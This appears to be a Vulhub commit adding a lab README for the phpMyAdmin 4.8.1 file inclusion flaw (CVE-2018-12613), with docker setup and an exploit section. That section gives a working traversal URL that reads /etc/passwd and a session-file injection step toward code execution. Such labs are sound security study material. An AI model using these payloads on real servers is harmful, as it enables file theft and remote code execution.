first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
30
phpmyadmin/CVE-2018-12613/README.md
Normal file
30
phpmyadmin/CVE-2018-12613/README.md
Normal file
@@ -0,0 +1,30 @@
|
||||
# phpmyadmin 4.8.1 Remote File Inclusion Vulnerability (CVE-2018-12613)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
PhpMyAdmin is a free software tool written in PHP, intended to handle the administration of MySQL over the Web. The vulnerability is in the `index.php`, causing files iclusion vulnerabilitiy.
|
||||
|
||||
Reference links:
|
||||
|
||||
- https://mp.weixin.qq.com/s/HZcS2HdUtqz10jUEN57aog
|
||||
- https://www.phpmyadmin.net/security/PMASA-2018-4/
|
||||
|
||||
## Setup
|
||||
|
||||
Run the following command to start phpmyadmin 4.8.1:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
After the environment starts, visit `http://your-ip:8080`. The phpmyadmin is "config" mode, so we can login directly.
|
||||
|
||||
## Exploit
|
||||
|
||||
Visit `http://your-ip:8080/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd`, the result indicates that the file inclusion vulnerability exist:
|
||||
|
||||
|
||||
|
||||
We can execute `SELECT '<?=phpinfo()?>';`, then check your sessionid (the value of phpMyAdmin in the cookie), and then include the session file:
|
||||
|
||||
|
||||
Reference in New Issue
Block a user